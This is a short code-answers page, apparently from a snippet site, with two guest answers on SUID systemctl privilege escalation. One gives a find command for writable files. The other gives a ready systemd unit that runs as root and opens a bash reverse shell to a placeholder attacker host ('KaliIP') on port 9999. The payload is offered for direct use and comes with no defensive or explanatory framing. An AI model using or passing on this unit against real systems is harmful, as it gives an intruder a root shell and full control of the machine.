Answers for "systemctl privilege escalation"

1

suid privilege escalation systemctl

find -type f -maxdepth 2 -writable
Posted by: Guest on January-02-2021
1

suid privilege escalation systemctl

[Unit]
Description=roooooooooot

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1'

[Install]
WantedBy=multi-user.target
Posted by: Guest on January-02-2021

Browse Popular Code Answers by Language